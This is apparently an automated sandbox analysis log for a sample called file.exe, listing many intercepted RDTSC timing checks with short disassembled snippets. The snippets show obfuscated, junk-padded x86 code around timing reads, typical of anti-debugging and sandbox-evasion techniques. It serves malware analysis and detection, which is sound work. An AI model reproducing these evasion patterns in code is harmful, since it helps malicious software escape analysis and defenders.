                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60BBB second address: 4A60BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60BC1 second address: 4A60BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60670 second address: 4A60695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov di, CF80h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60695 second address: 4A606D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 511063ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F5E60BA1665h 0x0000000e push ecx 0x0000000f pop edi 0x00000010 pop esi 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E60BA1666h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A606D0 second address: 4A606E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC68Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A606E2 second address: 4A60714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5E60BA1666h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dl, EBh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A603DA second address: 4A603E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A701B4 second address: 4A701FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60BA1661h 0x00000009 xor eax, 6491E9E6h 0x0000000f jmp 00007F5E60BA1661h 0x00000014 popfd 0x00000015 call 00007F5E60BA1660h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push ecx 0x00000023 pop edx 0x00000024 mov edx, eax 0x00000026 popad 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA094A second address: 4AA098F instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007F5E60CAC690h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5E60CAC690h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F5E60CAC690h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA098F second address: 4AA09AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80246 second address: 4A8024C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8024C second address: 4A80269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA1669h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80269 second address: 4A8026D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8026D second address: 4A8028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E60BA1663h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8028B second address: 4A80291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80291 second address: 4A80295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80295 second address: 4A802BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f jmp 00007F5E60CAC695h 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802BA second address: 4A802D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1661h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802D7 second address: 4A802DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802DB second address: 4A802DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A802DF second address: 4A802E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6059E second address: 4A605C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605C3 second address: 4A605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605C7 second address: 4A605CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605CB second address: 4A605D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A605D1 second address: 4A60606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5E60BA1660h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E60BA1668h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60606 second address: 4A60618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC68Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60618 second address: 4A6061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8001B second address: 4A80021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80021 second address: 4A80025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80025 second address: 4A80029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80029 second address: 4A80069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 22F2827Ch 0x00000011 pushfd 0x00000012 jmp 00007F5E60BA1665h 0x00000017 sub esi, 2D27A9D6h 0x0000001d jmp 00007F5E60BA1661h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA000F second address: 4AA0015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0015 second address: 4AA0019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0019 second address: 4AA0031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0031 second address: 4AA0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0035 second address: 4AA0050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC697h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0050 second address: 4AA0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 5E49h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0078 second address: 4AA007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA007D second address: 4AA00E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushfd 0x00000010 jmp 00007F5E60BA1661h 0x00000015 jmp 00007F5E60BA165Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F5E60BA1666h 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov edx, 59FC2640h 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F5E60BA1660h 0x00000035 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00E0 second address: 4AA00E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00E4 second address: 4AA00EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA00EA second address: 4AA01A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 19A3h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c call 00007F5E60CAC697h 0x00000011 mov bx, cx 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [76FA65FCh] 0x0000001b jmp 00007F5E60CAC68Bh 0x00000020 test eax, eax 0x00000022 jmp 00007F5E60CAC696h 0x00000027 je 00007F5ED312FEB2h 0x0000002d pushad 0x0000002e push esi 0x0000002f pushfd 0x00000030 jmp 00007F5E60CAC68Dh 0x00000035 add eax, 50DEC666h 0x0000003b jmp 00007F5E60CAC691h 0x00000040 popfd 0x00000041 pop ecx 0x00000042 pushfd 0x00000043 jmp 00007F5E60CAC691h 0x00000048 jmp 00007F5E60CAC68Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov ecx, eax 0x00000051 jmp 00007F5E60CAC696h 0x00000056 xor eax, dword ptr [ebp+08h] 0x00000059 pushad 0x0000005a pushad 0x0000005b mov ecx, edi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01A9 second address: 4AA01DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 movsx edx, si 0x00000009 pushfd 0x0000000a jmp 00007F5E60BA165Eh 0x0000000f xor al, FFFFFFC8h 0x00000012 jmp 00007F5E60BA165Bh 0x00000017 popfd 0x00000018 popad 0x00000019 popad 0x0000001a and ecx, 1Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01DB second address: 4AA01DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01DF second address: 4AA01FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA01FA second address: 4AA026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC699h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5E60CAC68Ch 0x00000012 and cl, FFFFFFB8h 0x00000015 jmp 00007F5E60CAC68Bh 0x0000001a popfd 0x0000001b mov ax, 22EFh 0x0000001f popad 0x00000020 leave 0x00000021 jmp 00007F5E60CAC692h 0x00000026 retn 0004h 0x00000029 nop 0x0000002a mov esi, eax 0x0000002c lea eax, dword ptr [ebp-08h] 0x0000002f xor esi, dword ptr [002C2014h] 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b push eax 0x0000003c call 00007F5E654CC817h 0x00000041 push FFFFFFFEh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5E60CAC697h 0x0000004a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA026C second address: 4AA02D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60BA165Fh 0x00000009 sub ch, FFFFFF8Eh 0x0000000c jmp 00007F5E60BA1669h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F5E60BA1660h 0x00000018 sbb si, E908h 0x0000001d jmp 00007F5E60BA165Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5E60BA1660h 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA02D6 second address: 4AA02DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA02DA second address: 4AA02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA02E0 second address: 4AA0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E60CAC68Ch 0x00000009 sub si, 9E98h 0x0000000e jmp 00007F5E60CAC68Bh 0x00000013 popfd 0x00000014 mov esi, 0AA1AC4Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ret 0x0000001d nop 0x0000001e push eax 0x0000001f call 00007F5E654CC8C9h 0x00000024 mov edi, edi 0x00000026 jmp 00007F5E60CAC692h 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F5E60CAC690h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007F5E60CAC68Ch 0x0000003a pushfd 0x0000003b jmp 00007F5E60CAC692h 0x00000040 add ecx, 72829288h 0x00000046 jmp 00007F5E60CAC68Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0365 second address: 4AA03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F22Ah 0x00000007 call 00007F5E60BA165Bh 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F5E60BA165Fh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E60BA1660h 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03A1 second address: 4AA03A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03A5 second address: 4AA03AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03AB second address: 4AA03B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA03B1 second address: 4AA03C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E60BA165Bh 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5001B second address: 4A50020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50020 second address: 4A5006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F5E60BA165Ch 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007F5E60BA1660h 0x00000017 mov ebp, esp 0x00000019 jmp 00007F5E60BA1660h 0x0000001e and esp, FFFFFFF8h 0x00000021 pushad 0x00000022 mov edi, eax 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edi, ax 0x0000002c popad 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5006A second address: 4A50094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60CAC694h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50094 second address: 4A500E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60BA1661h 0x00000008 jmp 00007F5E60BA1660h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 movsx edi, cx 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 mov bx, si 0x0000001b mov cl, 73h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5E60BA1662h 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500E0 second address: 4A500E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500E4 second address: 4A500EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500EA second address: 4A500FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 65h 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500FB second address: 4A500FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A500FF second address: 4A50105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50105 second address: 4A501A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5E60BA1664h 0x00000013 sub esi, 695463A8h 0x00000019 jmp 00007F5E60BA165Bh 0x0000001e popfd 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F5E60BA1666h 0x00000026 sbb esi, 2FAAD608h 0x0000002c jmp 00007F5E60BA165Bh 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F5E60BA1668h 0x00000038 sbb cx, F868h 0x0000003d jmp 00007F5E60BA165Bh 0x00000042 popfd 0x00000043 popad 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 mov si, AFF1h 0x0000004d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501A1 second address: 4A501CA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E60CAC68Eh 0x00000008 xor si, CAC8h 0x0000000d jmp 00007F5E60CAC68Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov ebx, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501CA second address: 4A501D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501D6 second address: 4A501DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A501DA second address: 4A5021E instructions: 0x00000000 rdtsc 0x00000002 mov di, A90Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop esi 0x0000000b pushfd 0x0000000c jmp 00007F5E60BA1661h 0x00000011 adc cl, FFFFFF96h 0x00000014 jmp 00007F5E60BA1661h 0x00000019 popfd 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5E60BA165Dh 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5021E second address: 4A5022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC68Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5022E second address: 4A50259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E60BA1665h 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50259 second address: 4A5025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5025F second address: 4A50263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50263 second address: 4A50288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F5E60CAC694h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50288 second address: 4A50309 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov ah, 81h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d test esi, esi 0x0000000f jmp 00007F5E60BA1663h 0x00000014 je 00007F5ED306F9C1h 0x0000001a jmp 00007F5E60BA1666h 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F5E60BA165Dh 0x0000002e pop eax 0x0000002f pushfd 0x00000030 jmp 00007F5E60BA1661h 0x00000035 xor eax, 4ECB9D86h 0x0000003b jmp 00007F5E60BA1661h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
